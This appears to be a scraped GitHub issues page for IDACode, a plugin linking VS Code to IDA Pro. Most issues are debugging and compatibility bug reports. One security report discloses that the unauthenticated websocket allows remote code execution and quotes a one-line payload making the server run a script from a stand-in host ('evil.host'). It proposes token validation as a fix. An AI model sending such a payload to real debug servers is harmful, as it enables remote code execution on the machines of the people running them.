ioncodes / idacode Goto Github PK

When it's trying to set the workspace to the plugins dir it fails with only one usage of each socket address allowed.

[IDACode] Listening on 127.0.0.1:7065
[INFO] 101 GET /ws (127.0.0.1) 15.00ms	(web:log_request)
[IDACode] Client connected
[IDACode] Set workspace folder to .....\plugins
[ERROR] Uncaught exception GET /ws (127.0.0.1)
HTTPServerRequest(protocol='http', host='127.0.0.1:7065', method='GET', uri='/ws', version='HTTP/1.1', remote_ip='127.0.0.1')	(web:log_exception)
Traceback (most recent call last):
  File "C:\python27-x64\lib\site-packages\tornado\websocket.py", line 546, in _run_callback
    result = callback(*args, **kwargs)
  File "...../plugins\idacode_utils\socket_handler.py", line 36, in on_message
    start_debug_server()
  File "...../plugins\idacode_utils\socket_handler.py", line 21, in start_debug_server
    debugpy.listen((settings.HOST, settings.DEBUG_PORT))
  File "C:\python27-x64\lib\site-packages\debugpy\__init__.py", line 113, in listen
    return api.listen(address)
  File "C:\python27-x64\lib\site-packages\debugpy\server\api.py", line 143, in debug
    log.reraise_exception("{0}() failed:", func.__name__, level="info")
  File "C:\python27-x64\lib\site-packages\debugpy\server\api.py", line 141, in debug
    return func(address, settrace_kwargs, **kwargs)
  File "C:\python27-x64\lib\site-packages\debugpy\server\api.py", line 234, in listen
    raise RuntimeError(str(endpoints["error"]))
RuntimeError: Can't listen for client connections: [Errno 10048] Only one usage of each socket address (protocol/network address/port) is normally permitted
[IDACode] Client disconnected

Something has changed between debugpy 1.0.0rc2 and 1.0.0, because on the latter I get the following error every time I try to attach the debugger from VSCode:

Can't find input file 'C:\Users\User\AppData\Local\Programs\Python\Python39\lib\site-packages\debugpy\adapter'

Workaround:

pip install --user debugpy===1.0.0rc2

Thanks for this wonderful extension ,it do make wrting ida python script much faster, I can step in, step out code, one strange thing I found is that I can't make break point from vsc, it said can't find the break point line, but I can make breakpoint inside idacode_utils, is there something with my config ? Thanks

When connecting to IDA and clicking the path InputBox away the resulting workspace is undefined

Hi, thanks for your plugin; it helped me. I had two small issues with using it, both of which I fixed (with one line of code apiece).

The plugin advertises Python 2.x support. In the current plugin.py, you put import asyncio to apparently get around some issue with tornado. This is not available on Python 2.x (I know, I need to update). I simply commented out this line. You might want to guard it by a version check for 3.0 or above, similar to what you do elsewhere throughout that file. (Edit: I see that PR #13 already addresses this.)

Secondly, in socket_handler.py, I experienced the issue where debugpy attempted to spawn the current process -- that is, the IDA executable -- when listening for connections. I had debug output like:

I+00021.467: debugpy.listen() spawning adapter: [
                 "C:\\Program Files\\IDA Pro 7.6\\ida64.exe", 
                 "C:\\Users\\Dev\\AppData\\Roaming\\Python\\Python27\\site-packages\\debugpy\\adapter", 

That first line is supposed to be the path to the Python interpreter, e.g., settings.PYTHON. After reading through debugpy, I can see that it consults sys.executable to obtain the path to the process that should be spawned. Presumably, this is why you modify this variable in your setup_patches function. However, the debugpy module gets loaded before setup_patches is called, which means that this technique does not work.

It turns out that you can instruct debugpy directly as to which executable to spawn. In socket_handler.py, I added one line of code before the call to listen:

debugpy.configure({'python': settings.PYTHON})

After both patches -- and installing the official Python extension for VSCode, as well as learning about the command pallette -- everything worked for me.

I'm trying to set a breakpoint using pdb.set_trace(), but I'm facing with the following exception every time I try to execute my script:

File "C:\python27-x64\Lib\bdb.py", line 68, in dispatch_line
    if self.quitting: raise BdbQuit
BdbQuit

I'm using IDA 7.2 and Python 2.7.18. Can anyone kindly help me with this issue? Thanks in advance.

Hi. I can connect to IDA to run my script, but I can't use the function "connect and attach". Here is the error message displayed in IDA.

An option that allows instant execution of a script on file save could be very useful.

If specific (and currently unknown) conditions are met, debugpy may not be able to kill the spawned Python process (debug server). A possible solution would be to hook the process creation function, make a copy of the process ID and then force kill it once IDA closes. This is a very hacky solution but it seems like debugpy doesn't provide specific API to tear down the debug server.

This issue was created in reference to #11.

According to #5 remote host is planned to be supported.
There is no authentication for the socket server yet. So an attacker may be able to communicate with the server and trigger a remote code execution:

ws.send(new Blob([JSON.stringify({event: 'execute_script', path: '\\\\evil.host\\calc.py'})]))

Luckily tornado has Origin validation by default, which means if the HOST is 127.0.0.1, the attacker can not talk to the backend from a web browser unless he's got a UXSS. But when using this utility for remote debugging (e.g., Host = '0.0.0.0'), it is possible for the attacker to spoof the Origin header and trigger a 0click rce.

Maybe adding a random token validation upon connection can avoid such problem

I struggled for hours and couldn't find a solution.
I hope I get a response soon, I need it for an urgent project, sorry

debugpy.server-1948.log
debugpy.adapter-9236.log
.

Hello, I am using idaaip.ask here_ File (...), prompt in IDA: NameError: name 'idaaip' is not defined. But this script can be run by directly loading it in ida. How can I configure it?

Python 2 compatibility will be tracked in this issue. If this is something you need, vote with a thumbs up!

Warning
idacode.py. invalid Python installation: unable to open /home/alay/Desktop/ida/lilb/python2.7/coniglMakefle (No such file o drectory)Traceback (most recent call last):

File "/home/alay/Desktop/ida_dt/ida_in/python/idaapi.py", line 558, in lDAPython_ExecScript execfile(script, g)

File "/home/alay/Desktop/ida_dt/ida_in/plugins/idacode.py", line 3, in
import idacode_utils.plugin as plugin
File "/home/alay/Desktop/ida_dt/ida_in/plugins/idacode_utils/plugin.py" , line 8, in
import idacode_utils.dbg as dbg
File "/home/alay/Desktop/ida_dt/ida_in/plugins/idacode_utils/dbg.py", line 2, in
from debugpy.server import api
File "/home/alay/Desktop/ida_dt/ida_in/python/lib/python2.7/debugpy/server/init.py", line 9, in import debugpy._vendored.force_pydevd # noqa
File "/home/alay/Desktop/lida_dtlida_in/python/ib/python2.7/debugpyl_vendored/force pydevd.py", line 54, in 'pydevd',
File "/home/alay/Desktop/ida_dt/ida_in/python/lib/

IDA Pro 7.0
My setting.py is:

HOST = "127.0.0.1"
PORT = 7065
DEBUG_PORT = 7066
PYTHON = "C:\\Users\\97527\\.conda\\envs\\gemini\\python.exe"
LOGGING = False

But

C:\Program Files\IDA 7.0\plugins\idacode.py: No module named concurrent.futures
Traceback (most recent call last):
  File "C:\Program Files\IDA 7.0\python\ida_idaapi.py", line 553, in IDAPython_ExecScript
    execfile(script, g)
  File "C:/Program Files/IDA 7.0/plugins/idacode.py", line 3, in <module>
    import idacode_utils.plugin as plugin
  File "C:\Program Files\IDA 7.0\plugins\idacode_utils\plugin.py", line 11, in <module>
    from idacode_utils.socket_handler import SocketHandler
  File "C:\Program Files\IDA 7.0\plugins\idacode_utils\socket_handler.py", line 1, in <module>
    import tornado.websocket, debugpy
  File "C:\Users\97527\AppData\Roaming\Python\Python27\site-packages\tornado\websocket.py", line 37, in <module>
    from tornado.queues import Queue
  File "C:\Users\97527\AppData\Roaming\Python\Python27\site-packages\tornado\queues.py", line 35, in <module>
    from tornado.locks import Event
  File "C:\Users\97527\AppData\Roaming\Python\Python27\site-packages\tornado\locks.py", line 18, in <module>
    from concurrent.futures import CancelledError
ImportError: No module named concurrent.futures

---------------------------------------------------------------------------------------------
Python 2.7.13 (v2.7.13:a06454b1afa1, Dec 17 2016, 20:53:40) [MSC v.1500 64 bit (AMD64)] 

How can I solve this problem?

for example :
pfn = ida_funcs.get_fchunk(ea)
idacode doesn't analyze that pfn is type of: ida_funcs.func_t, to fix it manually I can change the code to:
pfn: ida_funcs.func_t = ida_funcs.get_fchunk(ea)
is there any other way to do it automatically and not like this? I need this for the auto-completion

thank you very much :)

ida_version:7.6
tornado_version:6.0
debugpy_version:1.5
python_version:3.6

Does this only work for IDA 7.4?

Description

Imported modules do not reload when edited, keeping changes from being applied to main script.

How to reproduce

1. Create imported_module.py

def call_me():
    return 'Foo'

2. Create main.py

from imported_module import call_me

print(call_me())

3. Start IDACode from IDA

[IDACode] Listening on 127.0.0.1:7065

4. Connect IDACode from VSCode

[IDACode] Client connected
[IDACode] Set workspace folder to c:\ida_code_bug

5. Save main.py to trigger code execution

[IDACode] Executing c:\ida_code_bug\main.py
Foo

6. Edit call_me in imported_module.py to return Bar

def call_me():
    return 'Bar'

[IDACode] Executing c:\ida_code_bug\imported_module.py

7. Save main.py to trigger code execution

[IDACode] Executing c:\ida_code_bug\main.py
Foo

Expected result

call_me function should returns Bar.

Related issues

• #34

Hello, I've got some trouble getting idacode to work.
Using IDA Pro 7.5 SP1, Python 3.6 x64, latest VS Code and IDACode

Installed VSCode extension, IDA Plugin pip prerequisites, IDA Plugin. Verified settings. Loaded binary in IDA to analyze. Started Plugin in IDA:

[IDACode] Plugin version 0.1.4
[IDACode] Plugin loaded, use Edit -> Plugins -> IDACode to start the server
[IDACode] Listening on 127.0.0.1:7065

Then loading a small IDA Python script ("POP POP RET" gadget finder) in VSCode

breakpoint(name==".text", f"Lets get started")  <-- Added according to instructions

def disp(a,b,c,d): 			
	mnem1 = GetOpnd(a,0)  	
	mnem2 = GetOpnd(int(a+1),0) 	
	print( "0x%08x:" % a,b,mnem1,"|",c,mnem2,"|",d,"-",) 	
	y = Assemble(a, str(b+" "+mnem1))[1]  	
	a = a+1  	
	z = Assemble(a, str(c+" "+mnem2))[1]  	

	print ("\\x%x\\x%x\\xc3")%(ord(y[0]),ord(z[0]))  	

addr = SegByBase(SegByName(".text")) 	
end = SegEnd(addr)  		

while addr < end and addr != BADADDR:  	
	addr = NextAddr(addr)  	
	op1 = GetMnem(addr)  	
	if str(op1) == "pop":  	
		x = addr + 1  		
		op2 = GetMnem(x) 	
		if str(op2) == "pop":  	
			y = x + 1  		
			ret = GetMnem(y) 	
			if str(ret) == "retn":  	
				z = GetOperandValue(y,0)	
				if z == -1:	
					disp(addr,op1,op2,ret)  
				
print( "\n\nScript Finished!")

IDACode -> Connect and attach..., select folder "D:"

Message in IDA:

[IDACode] Client connected
[IDACode] Set workspace folder to d:\

Now IDACode -> Execute Script in IDA

gives me in IDA:

ERROR:tornado.application:Uncaught exception GET /ws (127.0.0.1)
HTTPServerRequest(protocol='http', host='127.0.0.1:7065', method='GET', uri='/ws', version='HTTP/1.1', remote_ip='127.0.0.1')
Traceback (most recent call last):
  File "C:\Python36\lib\site-packages\tornado\websocket.py", line 649, in _run_callback
    result = callback(*args, **kwargs)
  File "D:/Program Files/IDA Pro 7.5/plugins\idacode_utils\socket_handler.py", line 35, in on_message
    start_debug_server()
  File "D:/Program Files/IDA Pro 7.5/plugins\idacode_utils\socket_handler.py", line 20, in start_debug_server
    debugpy.listen((settings.HOST, settings.DEBUG_PORT))
  File "C:\Python36\lib\site-packages\debugpy\__init__.py", line 113, in listen
    return api.listen(address)
  File "C:\Python36\lib\site-packages\debugpy\server\api.py", line 141, in debug
    log.reraise_exception("{0}() failed:", func.__name__, level="info")
  File "C:\Python36\lib\site-packages\debugpy\server\api.py", line 139, in debug
    return func(address, settrace_kwargs, **kwargs)
  File "C:\Python36\lib\site-packages\debugpy\server\api.py", line 232, in listen
    raise RuntimeError(str(endpoints["error"]))
RuntimeError: Can't listen for client connections: [WinError 10048] Only one usage of each socket address (protocol/network address/port) is normally permitted
[IDACode] Client disconnected

Did I miss something?

If the python script to debug contains something like

if __name__ == '__main__':
    main()

the script will not run correctly. To fix, remove the "if" line and just directly call main().

Additional checks should be implemented to make sure the script is available on the remote side, if not it should be requested from the host.
This applies for other types of remote locations as well.

Hi, the recent version of idacode does not support adding breakpoints with vscode (F9), we have to add breakpoint() function in advance, which makes the debug process more complex. In previous versions of idacode, I remember it is feasible to add a breakpoint with vscode (F9) as long as one breakpoint() function has been added. Is it a bug that should be fixed or not? If not, is it possible to support adding a breakpoint with vscode?

Thanks for the useful extension. Do you have any plans about migrating the extension to pycharm plugin market?

After use IDACode sometimes I got some bug, only way to fix them is close and open IDA and VScode.
I think option to turn off and close socket in IDA and VSCode is useful.